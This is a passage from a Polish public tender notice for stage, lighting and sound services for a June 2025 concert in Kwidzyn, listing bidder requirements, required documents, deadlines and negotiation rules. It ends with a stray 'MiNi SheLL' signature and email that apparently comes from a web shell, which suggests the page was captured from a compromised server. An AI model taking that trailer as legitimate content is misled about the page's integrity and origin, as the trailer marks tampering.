postępowaniu dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym – Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie,<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie,<br/>3.	sytuacji ekonomicznej lub finansowej – Zamawiający wymaga aby Wykonawca wykazał, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniej niż 1 000 000 zł (milion złotych) na dzień składania oferty oraz przez cały okres realizacji zamówienia,<br/>4.	zdolności technicznej – Zamawiający wymaga, aby wykonawca wykazał, że wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie usługę obejmującą montaż i demontaż sceny, oświetlenie sceniczne oraz nagłośnienie sceniczne przeznaczonej na imprezę plenerową - o wartości usługi nie mniejszej niż 170 000,00 zł brutto każda.<br/>5.	zdolności zawodowej - Zamawiający wymaga, aby wykonawca wykazał, że skieruje do pracy przy realizacji zamówienia: <br/>–	przynajmniej jednego realizatora dźwięku FOH, który wykaże się doświadczeniem koordynacji wszystkich działań w tym zakresie podczas 3 imprez/eventów o wartości nie mniejszej niż 100.000 zł każda.<br/>–	przynajmniej jednego realizatora dźwięku MON, który wykaże się doświadczeniem koordynacji wszystkich działań w tym zakresie podczas 3 imprez/eventów o wartości nie mniejszej niż 100.000 zł każda.<br/>–	przynajmniej jednego realizatora światła, który wykaże się doświadczeniem koordynacji wszystkich działań w tym zakresie podczas 3 imprez/eventów o wartości nie mniejszej niż 100.000 zł każda.<br/>–	przynajmniej jednego stage menagera, który wykaże się doświadczeniem koordynacji wszystkich działań w tym zakresie podczas 3 imprez/eventów o wartości nie mniejszej niż 100.000 zł każda.<br/>1.3. Wykonawca zobowiązany jest uzyskać pisemne oświadczenie Agencji impresaryjnej „DETE” Marcin <br/> Toboła Danuta Toboła Spółka Cywilna z siedzibą w Lesznie (64-100) przy ul. Francuskiej 15, <br/> o akceptacji jego firmy do realizacji koncertu artystki Justyny Steczkowskiej w dniu 14 czerwca 202 5 <br/> w Kwidzynie w zakresie określonych w riderze technicznym stanowiącym załącznik do OPZ. (wymóg <br/> zawarty w umowie między Zamawiającym a Agencją). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.1.	Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>– wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane oraz załączeniem dowodów określających, czy usługi te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (Załącznik A wezwania do uzupełnienia dokumentów)<br/> - wykazu osób, które wezmą udział w realizacji zamówienia o których mowa w Rozdziale III, sekcja 51<br/>ust. 1.2 SWZ. (Załacznik A wezwania do uzupełnienia dokumentów)<br/>-	oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy pzp o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z 16 lutego 2007 roku o ochronie konkurencji i konsumentów. (Załacznik B wezwania do uzupełnienia dokumentów)<br/> - pisemne oświadczenie Agencji impresaryjnej „DETE” Marcin Toboła Danuta Toboła Spółka Cywilna z<br/>siedzibą w Lesznie (64-100) przy ul. Francuskiej 15, o akceptacji jego firmy do realizacji koncertu artystki Justyny Steczkowskiej w dniu 14 czerwca 2025 w Kwidzynie w zakresie określonych w riderze technicznym stanowiącym załącznik do OPZ (wymóg zawarty w umowie między Zamawiającym a Agencją). (Załącznik C wezwania do uzupełnienia dokumentów).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-	oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy pzp o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z 16 lutego 2007 roku o ochronie konkurencji i konsumentów. (Załacznik B wezwania do uzupełnienia dokumentów)<br/>- odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w zakresie art. 9 ust. 1 pkt.4 sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2) ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>4.3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.4.	W przypadku, o którym mowa w Rozdziale I, sekcja 4, ust. 4.2 i 4.3 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany umowy wymagają, dla swej ważności, zachowania formy pisemnej pod rygorem nieważności.<br/>2.	Zmiany umowy dopuszczalne będą w granicach wyznaczonych przepisami ustawy Prawo zamówień publicznych w tym art. 455 ust. 1 oraz ust. 2 tej ustawy oraz w niniejszej umowie.<br/>3.	W przypadku zmiany terminu imprezy wskutek okoliczności wskazanych w §9 ust. 1, Wykonawca w terminie 3 dni licząc od dnia poinformowania go o zmianie, oświadczy iż albo wykona przedmiot umowy w nowym terminie na warunkach określonych niniejszą umową albo odstępuje od umowy.<br/>4.	Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie, ani na wynik postępowania. Takimi zmianami są w szczególności zmiany o charakterze administracyjno-organizacyjnym umowy np. dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pomocą platformy zakupowej</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-07 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1. Zamawiający zaprasza do negocjacji wykonawców których oferty nie podlegają odrzuceniu z przyczyn określonych w art.<br/>226 uPzp.<br/>2. W przypadku podjęcia decyzji o prowadzeniu negocjacji, w pierwszym kroku Zamawiający poinformuje równocześnie<br/>wszystkich Wykonawców, którzy złożyli oferty, o Wykonawcach:<br/>1) których oferty nie zostały odrzucone, oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej<br/>punktacji,<br/>2) których oferty zostały odrzucone,<br/>podając uzasadnienie faktyczne i prawne.<br/>3. Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny<br/>ofert, w ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>4. Prowadzone negocjacje mają poufny charakter. Żadna ze stron nie może, bez zgody drugiej strony, ujawniać informacjitechnicznych i handlowych związanych z negocjacjami. Zgoda jest udzielana w odniesieniu do konkretnych informacji i<br/>przed ich ujawnieniem.<br/>5. Po zakończeniu negocjacji z Wykonawcami, Zamawiający informuje o tym fakcie uczestników negocjacji oraz zaprasza<br/>ich do składania ofert dodatkowych.<br/>6. Zaproszenie do złożenia ofert dodatkowych będzie zawierać co najmniej:<br/>1) nazwę oraz adres Zamawiającego, numer telefonu, adres poczty elektronicznej oraz strony internetowej prowadzonego<br/>postępowania;<br/>2) sposób i termin składania ofert dodatkowych oraz język lub języki, w jakich muszą one być sporządzone, oraz termin<br/>otwarcia tych ofert.<br/>7. Wykonawca może złożyć ofertę dodatkową, która zawiera nowe propozycje w zakresie treści oferty podlegających ocenie<br/>w ramach kryteriów oceny ofert wskazanych przez Zamawiającego w zaproszeniu do negocjacji.<br/>8. Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do<br/>negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu.<br/>9. Oferta przestaje wiązać Wykonawcę w zakresie, w jakim złoży on ofertę dodatkową zawierającą korzystniejsze<br/>propozycje w ramach każdego z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji.<br/>10. Oferta dodatkowa, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do<br/>negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu, podlega odrzuceniu W przypadku skorzystania<br/>przez Zamawiającego z możliwości negocjowania treści ofert, negocjacje dotyczyć będą wyłącznie tych elementów treści<br/>ofert, które podlegają ocenie w ramach kryteriów oceny ofert, o których mowa w rozdziale XIX niniejszej SWZ.<br/>11. Wymagania dotyczące sporządzenia i przekazywania oferty określone w SWZ mają odpowiednie zastosowanie do oferty<br/>dodatkowej.

Creat By MiNi SheLL
Email: jattceo@gmail.com